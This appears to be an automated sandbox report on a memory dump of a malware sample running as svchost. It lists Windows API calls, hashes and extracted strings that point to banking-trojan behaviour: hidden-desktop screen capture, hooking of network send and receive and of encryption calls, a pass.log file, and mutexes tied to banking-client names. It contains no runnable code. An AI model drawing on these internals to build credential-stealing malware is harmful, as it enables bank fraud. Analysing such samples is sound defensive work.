                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                            • String ID: $Content-Length: $POST
                                                                                                                                                                                                            • API String ID: 2509092961-2076583852
                                                                                                                                                                                                            • Opcode ID: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                            • Instruction ID: 20fb5f77d205ca073ff0fd67f8c3b62ce2f308a28ed9b6ee4e61b5401f3d3b17
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6718071D40256AFDB24EFA8DC84BAEBBB9FF88704F108669E814E7640D7309914CF91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC4D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC83
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000,6D1DA3E6), ref: 02C8CCC9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8A390,00000000,00000000,00000000), ref: 02C8CD48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CD60
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8CD71
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8CD97
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,02C87A4D), ref: 02C8CDD4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                            • String ID: 6D1DA3E6$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                            • API String ID: 4177962767-680892499
                                                                                                                                                                                                            • Opcode ID: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
                                                                                                                                                                                                            • Instruction ID: 06d8eef77a4d09b74bfb68f91aa851fec4f1dbc0fe938ed8cc18d0de3af1fdc7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC516F31D406455BD716BF34EC097E67BA9EF85308F14865BD80897280EB709B58CFE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,?,?), ref: 02C8B9C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA3E6$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                            • API String ID: 2545201083-2670487512
                                                                                                                                                                                                            • Opcode ID: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
                                                                                                                                                                                                            • Instruction ID: d0a2208008877b16d15c25a98c7cfc1f1bfd6b29ceef1f59d470caa040ab772e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51F6309046598FDB16DF24A858BE6BBF9EF86308F14C6D4D8C9D7211DB70DA89CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02C783E2
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C77FCA
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FD9
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteDC.GDI32(00000000), ref: 02C77FE7
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C77FF7
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FFF
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteDC.GDI32(?), ref: 02C78008
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: GetDC.USER32(00000000), ref: 02C7800C
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C7801B
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C78023
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C78044
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C78053
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C7806E
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C7808D
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: ReleaseDC.USER32(00000000,00000000), ref: 02C7809C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C7840C
                                                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 02C7841B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78432
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C78448
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7844B
                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?,00000000), ref: 02C7845F
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02C78481
                                                                                                                                                                                                            • GetIconInfo.USER32(?,?), ref: 02C7848D
                                                                                                                                                                                                            • DrawIcon.USER32(00000000,00000000,?,?), ref: 02C784AE
                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,00000000), ref: 02C784B5
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02C784C2
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02C784CF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02C784DB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelectWindow$Icon$BitmapReleaseSingleWait$DesktopDestroyDrawEventFromInfoMessageMutexPointSendSleepThread
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2294845507-465009422
                                                                                                                                                                                                            • Opcode ID: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                            • Instruction ID: 0e43117837ab6268a9a67490fb1ba952dea540b34f6c08637e1ff143d0f09b8b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A313674A80341AFC616EBB4EC8DF1B7769EB88711F008F98F61587280DA74E921CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91B67
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da6b7,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da6b7$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$RSTYLE
                                                                                                                                                                                                            • API String ID: 505831200-1961891315
                                                                                                                                                                                                            • Opcode ID: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
                                                                                                                                                                                                            • Instruction ID: 87246e837453476ab8cb3a90fcf2ea0ea17a32e8c0ab618fc1457228210fe869
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0711E530AC47537BF7226B648C1FF1E37886F81B29F088644F919620C1EBF485008B67
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C90BA7
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da7aa,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da7aa$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RAIFF
                                                                                                                                                                                                            • API String ID: 505831200-2981933777
                                                                                                                                                                                                            • Opcode ID: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
                                                                                                                                                                                                            • Instruction ID: 1bfc5cdfe3475c5b9873aec1f5fa2bb2d161855bd81734d9005c03239ff8d8f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7811E530AC5752BEFB225B648C1FF1E37C86F80B19F108654F955A20C1EBB0D5008B67
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C792BE
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C792FF
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C79385
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C793AC
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C793F1
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C79445
                                                                                                                                                                                                              • Part of subcall function 02C79160: GetTickCount.KERNEL32 ref: 02C791EA
                                                                                                                                                                                                              • Part of subcall function 02C79160: GetClassLongA.USER32(00000000,000000E6), ref: 02C7923D
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C794AE
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C794D9
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C79555
                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 02C79574
                                                                                                                                                                                                            • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C79598
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C79603
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C79616
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C79639
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C7965B
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79693
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C796BD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 590198697-0
                                                                                                                                                                                                            • Opcode ID: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                            • Instruction ID: 28f0c27428ceba17d6f8045eb40a16bd936f8f5dabe40bbc738a6dc2b58ad52d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80B15832F402146AEB219A69DC89FBF7B68E7C2714F00463AFD05971C1C7798A51DBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D6BA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6CA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6CD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6DA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D6DD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6ED
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6F0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6FD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D700
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D710
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D713
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D720
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D723
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,00000000,02C7EAE2), ref: 02C7D75D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D760
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?), ref: 02C7D76C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D76F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                            • Instruction ID: 96d5c744759e76c387bd5157526568cf865ea02f85927ef851269706937036c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731A172E843516BEB225F65AC88F5B77ACEFC0F56F090A19E40B93184DB31E910C6A0
APIs
• SetThreadDesktop.USER32(?,7556F590,755616B0,00000000), ref: 02C780BF
• GetDC.USER32(00000000), ref: 02C780C7
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
• GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
• CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
• GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
• GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
• DeleteObject.GDI32(00000000), ref: 02C78155
• ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781D2
• HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781EF
• SetThreadDesktop.USER32(?), ref: 02C78224
Strings
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
• String ID: (
• API String ID: 188880187-3887548279
APIs
• GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75497390), ref: 02C8F0DD
• GetProcessHeap.KERNEL32(00000008,?), ref: 02C8F0F4
• HeapAlloc.KERNEL32(00000000), ref: 02C8F0FB
• memset.MSVCRT ref: 02C8F10B
• ReadFile.KERNEL32 ref: 02C8F12C
• StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02C8F142
• StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02C8F14E
• SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75497390), ref: 02C8F172
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F185
• HeapValidate.KERNEL32(00000000), ref: 02C8F188
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F195
• HeapFree.KERNEL32(00000000), ref: 02C8F198
Strings
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$FileProcess$AllocFreePointerReadSizeValidatememset
• String ID: BEGIN SIGNATURE$END SIGNATURE
• API String ID: 2165369453-4158457813
APIs
• LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7556F550,7556DF10,02C8475B), ref: 02C882F1
• GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02C88303
  • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
  • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
  • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
  • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
• LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C88322
• GetProcAddress.KERNEL32(00000000,send), ref: 02C88330
• GetProcAddress.KERNEL32(00000000,WSASend), ref: 02C8834C
• GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02C88368
• GetProcAddress.KERNEL32(00000000,recv), ref: 02C88384
Strings
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
• String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
• API String ID: 1216545827-2206184491
APIs
• OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
• ReleaseMutex.KERNEL32(00000000), ref: 02C90319
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
• CloseHandle.KERNEL32(00000000), ref: 02C9033F
• CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
• CloseHandle.KERNEL32(00000000), ref: 02C90366
• PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C9036D
• Sleep.KERNEL32(00009C40,6d1da03d,KBP), ref: 02C90387
• Sleep.KERNEL32(00000064), ref: 02C90390
Strings
Memory Dump Source
